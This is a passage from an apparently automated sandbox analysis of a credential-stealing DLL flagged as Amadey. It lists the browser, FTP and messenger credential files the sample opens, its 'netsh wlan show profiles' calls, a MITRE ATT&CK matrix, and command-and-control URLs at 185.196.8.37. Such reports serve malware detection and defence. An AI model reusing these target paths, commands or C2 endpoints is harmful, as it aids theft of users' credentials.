    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    barindex
    Yara detected Amadeys stealer DLL
    Source: Yara matchFile source: cred.dll, type: SAMPLE
    Tries to harvest and steal WLAN passwords
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\logins.jsonJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
    Tries to steal Instant Messenger accounts or passwords
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files (x86)\awAqlPMQmFjrwTTavmOVTRjaCXftDjcPubdBaHVFMxAPsKNvggU\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files (x86)\awAqlPMQmFjrwTTavmOVTRjaCXftDjcPubdBaHVFMxAPsKNvggU\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files (x86)\awAqlPMQmFjrwTTavmOVTRjaCXftDjcPubdBaHVFMxAPsKNvggU\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\.purple\accounts.xmlJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		111
    Process Injection    		1
    Disable or Modify Tools    		2
    OS Credential Dumping    		1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		1
    Credentials in Registry    		1
    Process Discovery    		Remote Desktop Protocol2
    Data from Local System    		1
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
    Process Injection    		1
    Credentials In Files    		21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive11
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Rundll32    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1620561 Sample: cred.dll Startdate: 21/02/2025 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 8 other signatures 2->60 9 loaddll32.exe 1 2->9         started        process3 process4 11 rundll32.exe 29 9->11         started        14 rundll32.exe 26 9->14         started        16 cmd.exe 1 9->16         started        18 3 other processes 9->18 signatures5 70 System process connects to network (likely due to code injection or exploit) 11->70 72 Tries to steal Instant Messenger accounts or passwords 11->72 74 Tries to harvest and steal ftp login credentials 11->74 76 Tries to harvest and steal browser information (history, passwords, etc) 11->76 20 powershell.exe 11->20         started        23 netsh.exe 11->23         started        78 Uses netsh to modify the Windows network and firewall settings 14->78 80 Tries to harvest and steal WLAN passwords 14->80 25 powershell.exe 26 14->25         started        28 netsh.exe 2 14->28         started        30 rundll32.exe 28 16->30         started        process6 dnsIp7 33 conhost.exe 20->33         started        35 conhost.exe 23->35         started        50 C:\Users\user\...\246122658369_Desktop.zip, Zip 25->50 dropped 62 Loading BitLocker PowerShell Module 25->62 37 conhost.exe 25->37         started        39 conhost.exe 28->39         started        52 185.196.8.37, 49706, 49707, 49708 SIMPLECARRER2IT Switzerland 30->52 64 Tries to steal Instant Messenger accounts or passwords 30->64 66 Tries to harvest and steal WLAN passwords 30->66 41 powershell.exe 30->41         started        44 netsh.exe 2 30->44         started        file8 signatures9 process10 signatures11 68 Loading BitLocker PowerShell Module 41->68 46 conhost.exe 41->46         started        48 conhost.exe 44->48         started        process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    cred.dll76%ReversingLabsWin32.Spyware.Multiverze
    cred.dll82%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://185.196.8.37/Gd85kkjf/index.php100%Avira URL Cloudmalware
    http://185.196.8.37/=10%Avira URL Cloudsafe
    http://185.196.8.37/Gd85kkjf/index.php?wal=1/100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=13100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1E100%Avira URL Cloudmalware
    http://185.196.8.37/-A2D8-08002B30309D0%Avira URL Cloudsafe
    http://185.196.8.37/Gd85kkjf/index.php?wal=1100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1yq100%Avira URL Cloudmalware
    http://185.196.8.37/0%Avira URL Cloudsafe
    http://185.196.8.37/Gd85kkjf/index.php?wal=13l100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php%q0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://185.196.8.37/Gd85kkjf/index.phptrue
    • Avira URL Cloud: malware
    		unknown
    http://185.196.8.37/Gd85kkjf/index.php?wal=1true
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
